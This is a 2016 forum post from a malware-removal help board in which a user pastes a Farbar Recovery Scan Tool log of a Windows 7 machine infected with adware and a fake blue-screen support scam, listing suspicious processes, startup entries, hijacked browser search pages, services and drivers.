[Resolved] Blue screen appeared with error: 0xc0000428 ..asking me to call toll free number

Discussion in 'Spyware, Adware, Viruses and Malware Removal' started by photiost, Sep 18, 2016.

  1. photiost

    photiost Established Techie7 Member

    This is the FRST scan:

    *** Initially I was warned the text is too long ...I had to shorten it ***
    *** remove `Some files in TEMP:` section ***

    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 17-09-2016
    Ran by Administrator (administrator) on DELL35X8BT1 (18-09-2016 11:57:40)
    Running from C:\Users\Administrator\Downloads
    Loaded Profiles: Administrator (Available Profiles: Administrator)
    Platform: Windows 7 Professional Service Pack 1 (X64) Language: English (United States)
    Internet Explorer Version 11 (Default browser: FF)
    Boot Mode: Normal
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    (IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
    (Microsoft Corporation) C:\Windows\System32\wlanext.exe
    (SUPERAntiSpyware.com) C:\Program Files\SUPERAntiSpyware\SASCore64.exe
    (Andrea Electronics Corporation) C:\Program Files\IDT\WDM\AESTSr64.exe
    () C:\ProgramData\Logic Handler\set.exe
    (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
    () C:\ProgramData\CloudPrinter\CloudPrinter.exe
    (DeskTopService) C:\ProgramData\desktopfindkey\desktop189.exe
    () C:\Program Files (x86)\Stlr\nerta\nertacs.exe
    (O2Micro International) C:\Windows\System32\drivers\o2flash.exe
    () C:\Users\Administrator\AppData\Local\Apps\2.0\abril.exe
    () C:\ProgramData\Ronzap\Ronzap.exe
    () C:\Program Files (x86)\4C4C4544-1474199813-5810-8038-B3C04F425431\knskAF7C.tmpfs
    () C:\Users\Administrator\AppData\Local\4C4C4544-1474185518-5810-8038-B3C04F425431\qnsaF06.tmp
    (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\Apoint.exe
    (Intel Corporation) C:\Windows\System32\igfxtray.exe
    (Intel Corporation) C:\Windows\System32\hkcmd.exe
    (Intel Corporation) C:\Windows\System32\igfxpers.exe
    (IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
    (SUPERAntiSpyware) C:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE
    () C:\Program Files (x86)\Stlr\nerta\nerta.exe
    (Global surveys) C:\Users\Administrator\AppData\Roaming\Interstatnogui\interstatnogui.exe
    (Microsoft Corporation) C:\Windows\System32\rundll32.exe
    (Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
    (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
    (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApMsgFwd.exe
    (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\hidfind.exe
    (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApntEx.exe
    (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
    (Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
    (Microsoft Corporation) C:\Windows\System32\dllhost.exe


    ==================== Registry (Whitelisted) ===========================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [Apoint] => C:\Program Files\DellTPad\Apoint.exe [626552 2012-06-18] (Alps Electric Co., Ltd.)
    HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [525312 2011-02-15] (IDT, Inc.)
    HKLM\...\Run: [IDSCCOMVGX] => "C:\Program Files (x86)\EasyHotspot\idsccom_VGX.exe"
    HKLM\...\Run: [WINCOM6YE] => "C:\Program Files (x86)\mpck\wincom_6YE.exe"
    HKLM\...\Run: [WINCOM1YV] => "C:\Program Files (x86)\sunnyday\wincom_1YV.exe"
    HKLM\...\Run: [WINCOMCF4] => "C:\Program Files (x86)\sunnyday\wincom_CF4.exe"
    HKLM\...\Run: [WINCOMH7U] => "C:\Program Files (x86)\sunnyday\wincom_H7U.exe"
    HKLM\...\Run: [WINCOMTAO] => "C:\Program Files (x86)\sunnyday\wincom_TAO.exe"
    HKLM-x32\...\Run: [EasyHotspot] => "C:\Program Files (x86)\EasyHotspot\EasyHotspot.exe"
    HKLM-x32\...\Run: [DiskPower] => "C:\Program Files (x86)\DPower\DiskPower.exe"
    HKLM-x32\...\Run: [win_en_77] => [X]
    HKLM-x32\...\Run: [sun21] => "C:\Program Files (x86)\SunnyDay21\SunnyDay.exe"
    Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [SUPERAntiSpyware] => C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe [7943072 2016-09-12] (SUPERAntiSpyware)
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [Chromium] => c:\users\administrator\appdata\local\chromium\application\chrome.exe [1068544 2016-03-18] (The Chromium Authors)
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [Interstatnogui] => C:\Users\Administrator\AppData\Roaming\Interstatnogui\interstatnogui.exe [4110848 2016-09-18] (Global surveys)
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [misgua] => C:\Users\Administrator\AppData\Local\misgua.dll [895488 2016-09-18] () <===== ATTENTION
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [MHX680O3EE] => "C:\Program Files (x86)\DPower\F10H5ROMJR.exe"
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [UD8BS0RW9M] => "C:\Program Files (x86)\DPower\OMAX7YIRM1.exe"
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [Pritc] => C:\Users\Administrator\AppData\Local\Temp\00006210\casrss.exe [3445760 2016-09-18] (VLOME) <===== ATTENTION
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [MP86W16DCV] => "C:\Program Files (x86)\DPower\NFQMP4E7QL.exe"
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [ID9KZOQAXP] => "C:\Program Files (x86)\DPower\NMJA5FXU1Z.exe"
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [R3TEGTCHQT] => "C:\Program Files (x86)\DPower\D7HVZHU1UW.exe"
    AppInit_DLLs: C:\ProgramData\Ronzap\S-la.dll => C:\ProgramData\Ronzap\S-la.dll [358912 2016-09-18] ()
    AppInit_DLLs-x32: C:\ProgramData\Ronzap\IndigoString.dll => C:\ProgramData\Ronzap\IndigoString.dll [248320 2016-09-18] ()
    ShellIconOverlayIdentifiers: [KzShlobj2] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F3} => C:\Program Files (x86)\KuaiZip\X64\KZipShell.dll No File
    Startup: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Nerta.lnk [2016-09-18]
    ShortcutTarget: Nerta.lnk -> C:\Windows\System32\schtasks.exe (Microsoft Corporation)
    GroupPolicy: Restriction - Chrome <======= ATTENTION
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
    Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 24.200.241.37 24.202.72.13
    Tcpip\..\Interfaces\{847875CA-4350-447D-B3C9-2FCDA250440E}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{89A762F9-B74D-436A-84D8-F2F7E6D9B073}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{B4EC977B-3636-4217-8CA1-D8DE45EDD7B6}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{B4EC977B-3636-4217-8CA1-D8DE45EDD7B6}: [DhcpNameServer] 192.168.0.1 24.200.241.37 24.202.72.13
    Tcpip\..\Interfaces\{FE93FD32-9915-47D1-AB78-70D4CDC6F6D6}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{FE93FD32-9915-47D1-AB78-70D4CDC6F6D6}: [DhcpNameServer] 10.254.240.200 10.254.240.201

    Internet Explorer:
    ==================
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://ca.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_dnldwz_16_37&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dca%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0DtDyCyB0EyDyDyDtA0E0F0B0D0DtA0CtN0D0Tzu0StCyBtBtDtN1L2XzutAtFtByEtFyCtFzytN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StBzz0A0F0FyEyB0BtGtAyEtByDtG0CyDyC0EtGtAtC0F0DtG0DzzyCyDyE0C0ByDzz0F0F0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtByBtCyDyCyEtG0C0B0E0BtGyE0DyE0DtGzz0F0FyEtGtCtBzyyB0BzzyD0DyBtCtCyE2QtN0A0LzuyE%26cr%3D344908437%26a%3Dwbf_dnldwz_16_37%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://ca.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_dnldwz_16_37&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dca%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0DtDyCyB0EyDyDyDtA0E0F0B0D0DtA0CtN0D0Tzu0StCyBtBtDtN1L2XzutAtFtByEtFyCtFzytN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StBzz0A0F0FyEyB0BtGtAyEtByDtG0CyDyC0EtGtAtC0F0DtG0DzzyCyDyE0C0ByDzz0F0F0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtByBtCyDyCyEtG0C0B0E0BtGyE0DyE0DtGzz0F0FyEtGtCtBzyyB0BzzyD0DyBtCtCyE2QtN0A0LzuyE%26cr%3D344908437%26a%3Dwbf_dnldwz_16_37%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1J11uXjiR7YVSkPeiKmfPOLv7QqXYORPqxweZDJKi_WHZcvGQzECwT7x46dUu4bTMH0VnvXC0zMNWVBv61pi6ALcMQ9CuX4UgfgJcy9a1i0k6XCPwlyZnfL1UVX9U6AZMwOEwroMs2KQBBAMr-quzCMLzWDEY_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms}
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.cloudynights.com/page/index.html
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.microsoft.com/
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1J11uXjiR7YVSkPeiKmfPOLv7QqXYORPqxweZDJKi_WHZcvGQzECwT7x46dUu4bTMH0VnvXC0zMNWVBv61pi6ALcMQ9CuX4UgfgJcy9a1i0k6XCPwlyZnfL1UVX9U6AZMwOEwroMs2KQBBAMr-quzCMLzWDEY_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms}
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\Main,SearchAssistant = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1J11uXjiR7YVSkPeiKmfPOLv7QqXYORPqxweZDJKi_WHZcvGQzECwT7x46dUu4bTMH0VnvXC0zMNWVBv61pi6ALcMQ9CuX4UgfgJcy9a1i0k6XCPwlyZnfL1UVX9U6AZMwOEwroMs2KQBBAMr-quzCMLzWDEY_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms}
    SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://ca.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_softdl4u_16_25&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dca%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0DtDyCyB0EyDyDyDtA0E0F0B0D0DtA0CtN0D0Tzu0StCyCtAyEtN1L2XzutAtFtBtAtFtCtFtBtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyDtDtAyCtAtD0FtDtGtDyB0BtDtGyDzy0EzytGyCzytD0BtGyByEtB0AyC0EyByByBtD0DyC2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtByBtCyDyCyEtG0C0B0E0BtGyE0DyE0DtGzz0F0FyEtGtCtBzyyB0BzzyD0DyBtCtCyE2QtN0A0LzuyE%26cr%3D1235740085%26a%3Dwbf_softdl4u_16_25%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional&p={searchTerms}
    SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://ca.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_softdl4u_16_25&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dca%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0DtDyCyB0EyDyDyDtA0E0F0B0D0DtA0CtN0D0Tzu0StCyCtAyEtN1L2XzutAtFtBtAtFtCtFtBtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyDtDtAyCtAtD0FtDtGtDyB0BtDtGyDzy0EzytGyCzytD0BtGyByEtB0AyC0EyByByBtD0DyC2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtByBtCyDyCyEtG0C0B0E0BtGyE0DyE0DtGzz0F0FyEtGtCtBzyyB0BzzyD0DyBtCtCyE2QtN0A0LzuyE%26cr%3D1235740085%26a%3Dwbf_softdl4u_16_25%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional&p={searchTerms}
    SearchScopes: HKLM -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxps://ca.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_dnldwz_16_37&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dca%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0DtDyCyB0EyDyDyDtA0E0F0B0D0DtA0CtN0D0Tzu0StCyBtBtDtN1L2XzutAtFtByEtFyCtFzytN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StBzz0A0F0FyEyB0BtGtAyEtByDtG0CyDyC0EtGtAtC0F0DtG0DzzyCyDyE0C0ByDzz0F0F0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtByBtCyDyCyEtG0C0B0E0BtGyE0DyE0DtGzz0F0FyEtGtCtBzyyB0BzzyD0DyBtCtCyE2QtN0A0LzuyE%26cr%3D344908437%26a%3Dwbf_dnldwz_16_37%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional&p={searchTerms}
    SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
    SearchScopes: HKLM-x32 -> ielnksrch URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1J11uXjiR7YVSkPeiKmfPOLv7QqXYORPqxweZDJKi_WHZcvGQzECwT7x46dUu4bTMH0VnvXC0zMNWVBv61pi6ALcMQ9CuX4UgfgJcy9a1i0k6XCPwlyZnfL1UVX9U6AZMwOEwroMs2KQBBAMr-quzCMLzWDEY_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms}
    SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://ca.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_softdl4u_16_25&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dca%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0DtDyCyB0EyDyDyDtA0E0F0B0D0DtA0CtN0D0Tzu0StCyCtAyEtN1L2XzutAtFtBtAtFtCtFtBtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyDtDtAyCtAtD0FtDtGtDyB0BtDtGyDzy0EzytGyCzytD0BtGyByEtB0AyC0EyByByBtD0DyC2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtByBtCyDyCyEtG0C0B0E0BtGyE0DyE0DtGzz0F0FyEtGtCtBzyyB0BzzyD0DyBtCtCyE2QtN0A0LzuyE%26cr%3D1235740085%26a%3Dwbf_softdl4u_16_25%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional&p={searchTerms}
    SearchScopes: HKLM-x32 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxps://ca.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_dnldwz_16_37&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dca%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0DtDyCyB0EyDyDyDtA0E0F0B0D0DtA0CtN0D0Tzu0StCyBtBtDtN1L2XzutAtFtByEtFyCtFzytN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StBzz0A0F0FyEyB0BtGtAyEtByDtG0CyDyC0EtGtAtC0F0DtG0DzzyCyDyE0C0ByDzz0F0F0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtByBtCyDyCyEtG0C0B0E0BtGyE0DyE0DtGzz0F0FyEtGtCtBzyyB0BzzyD0DyBtCtCyE2QtN0A0LzuyE%26cr%3D344908437%26a%3Dwbf_dnldwz_16_37%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional&p={searchTerms}
    SearchScopes: HKU\S-1-5-21-1896049756-2371463424-3974721238-500 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?pc=COSP&ptag=D091816-A251FF33716&form=CONBDF&conlogo=CT3334491&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-1896049756-2371463424-3974721238-500 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?pc=COSP&ptag=D091816-A251FF33716&form=CONBDF&conlogo=CT3334491&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-1896049756-2371463424-3974721238-500 -> {533D4D7B-F377-41D8-B141-A29968AF875A} URL = hxxp://www-searching.com/s.ashx?prd=opensearch&q={searchTerms}&s=G9Izftpbl0cshmoAU,488cdb43-66e8-4d85-9ddc-52057119e93e,
    SearchScopes: HKU\S-1-5-21-1896049756-2371463424-3974721238-500 -> {ielnksrch} URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1J11uXjiR7YVSkPeiKmfPOLv7QqXYORPqxweZDJKi_WHZcvGQzECwT7x46dUu4bTMH0VnvXC0zMNWVBv61pi6ALcMQ9CuX4UgfgJcy9a1i0k6XCPwlyZnfL1UVX9U6AZMwOEwroMs2KQBBAMr-quzCMLzWDEY_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms}
    BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2016-09-05] (Microsoft Corporation)
    BHO: Icatti -> {7B6678FD-F9E3-46FD-aCF0-4C011573F737} -> C:\Program Files\Icatti\Orosbusf64.dll => No File
    BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
    BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2016-09-05] (Microsoft Corporation)
    BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2016-09-05] (Microsoft Corporation)
    BHO-x32: Icatti -> {7B6678FD-F9E3-46FD-aCF0-4C011573F737} -> C:\Program Files\Icatti\Orosbusf.dll => No File
    BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
    BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL [2016-09-05] (Microsoft Corporation)
    Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-09-05] (Microsoft Corporation)
    Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-09-05] (Microsoft Corporation)
    Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-09-05] (Microsoft Corporation)
    Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-09-05] (Microsoft Corporation)
    StartMenuInternet: IEXPLORE.EXE - iexplore.exe

    FireFox:
    ========
    FF ProfilePath: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default
    FF NewTab: C:\\ProgramData\\Doubleings\\ff.NT
    FF DefaultSearchEngine: Search Module
    FF SelectedSearchEngine: Search Module
    FF Homepage: C:\\ProgramData\\Doubleings\\ff.HP
    FF Keyword.URL: user_pref("keyword.URL", true);
    FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
    FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
    FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-09-05] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-09-05] (Microsoft Corporation)
    FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-02-04] (VideoLAN)
    FF user.js: detected! => C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\user.js [2016-09-18]
    FF SearchPlugin: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\searchplugins\bing-lavasoft.xml [2016-09-18]
    FF SearchPlugin: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\searchplugins\coldsearch.xml [2016-09-18]
    FF SearchPlugin: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\searchplugins\smod.xml [2016-09-18]
    FF SearchPlugin: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\searchplugins\trovi.xml [2016-09-18]
    FF Extension: (Firefox Hotfix) - C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\Extensions\firefox-hotfix@mozilla.org.xpi [2016-09-14]
    FF Extension: (Video DownloadHelper) - C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2016-09-16]

    ==================== Services (Whitelisted) ========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R2 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [172344 2014-07-22] (SUPERAntiSpyware.com)
    R2 backlh; C:\ProgramData\Logic Handler\set.exe [2089472 2016-05-15] () [File not signed]
    R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2980032 2016-09-05] (Microsoft Corporation)
    R2 CloudPrinter; C:\ProgramData\\CloudPrinter\\CloudPrinter.exe [2148864 2016-09-18] () [File not signed]
    R2 DeskTop_E; C:\ProgramData\desktopfindkey\desktop189.exe [243936 2016-07-26] (DeskTopService) <==== ATTENTION
    R2 nrtService; C:\Program Files (x86)\Stlr\nerta\nertacs.exe [12288 2016-08-16] () [File not signed] <==== ATTENTION
    R2 ProntSpooler; C:\Users\Administrator\AppData\Local\Apps\2.0\abril.exe [134656 2016-05-19] () [File not signed] <==== ATTENTION
    R2 Ronzap; C:\ProgramData\\Ronzap\\Ronzap.exe [2148864 2016-09-18] () [File not signed]
    S2 SMUpd; C:\Program Files\Common Files\Noobzo\GNUpdate\smu.exe [3109888 2016-09-18] (Search Module Ltd.) [File not signed]
    S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
    R2 zigipyro; C:\Users\Administrator\AppData\Local\4C4C4544-1474185518-5810-8038-B3C04F425431\qnsaF06.tmp [158720 2015-12-26] () [File not signed]
    S2 CltMngSvc; C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe [X]
    S2 FastCompress; C:\Program Files (x86)\FastCompress-Zip\Fast_Support.exe [X] <==== ATTENTION
    S2 HpSvc; C:\Program Files (x86)\LuDaShi\lpi\HpSvc.dll [X] <==== ATTENTION
    S2 Kuaizip Update Checker; C:\Program Files (x86)\KuaiZip\X86\kuaizipUpdateChecker.dll [X]
    S2 rtop; "C:\Program Files\ByteFence\rtop\bin\rtop_svc.exe" [X]
    R2 xytekyby; C:\Program Files (x86)\4C4C4544-1474199813-5810-8038-B3C04F425431\knskAF7C.tmpfs [X]

    ===================== Drivers (Whitelisted) ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    S3 atmeltpm; C:\Windows\system32\drivers\atmeltpm64.sys [19456 2012-05-25] (Atmel, Inc.)
    S3 BCMTPM; C:\Windows\system32\drivers\btpmwx64.sys [32096 2012-05-25] (Broadcom Corp.)
    S3 d554gps; C:\Windows\system32\drivers\d554gps64.sys [102440 2012-06-18] (Ericsson AB)
    S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
    S3 ecnssndis; C:\Windows\System32\Drivers\wwuss64.sys [26664 2012-06-18] (Ericsson AB)
    S3 ecnssndisfltr; C:\Windows\System32\Drivers\wwussf64.sys [29736 2012-06-18] (Ericsson AB)
    R2 KuaiZipDrive2; C:\WINDOWS\system32\drivers\KuaiZipDrive2.sys [93072 2016-09-18] (WinMount International Inc) <==== ATTENTION
    S3 Mbm3CBus; C:\Windows\system32\drivers\Mbm3CBus.sys [419400 2012-06-18] (MCCI Corporation)
    S3 Mbm3DevMt; C:\Windows\system32\drivers\Mbm3DevMt.sys [430664 2012-06-18] (MCCI Corporation)
    S3 nwdelgobi3kfilter; C:\Windows\system32\drivers\nwdelgobi3kfilter.sys [34304 2012-11-06] (Novatel Wireless Inc)
    S3 NWDellPort; C:\Windows\system32\drivers\nwdelser.sys [222208 2012-11-06] (Novatel Wireless Inc.)
    S3 NWDellPort2; C:\Windows\system32\drivers\nwdelser2.sys [222208 2012-11-06] (Novatel Wireless Inc.)
    S3 nwdelserial; C:\Windows\system32\drivers\nwdelserial.sys [234112 2012-11-06] (Novatel Wireless Inc.)
    S3 qcfilterdl2k; C:\Windows\system32\drivers\qcfilterdl2k.sys [6400 2012-07-05] (QUALCOMM Incorporated)
    S3 qcombusdl; C:\Windows\system32\drivers\qcombusdl.sys [137800 2012-07-05] (MCCI)
    S3 qcusbserdl2k; C:\Windows\system32\drivers\qcusbserdl2k.sys [230784 2012-07-05] (QUALCOMM Incorporated)
    R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
    R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
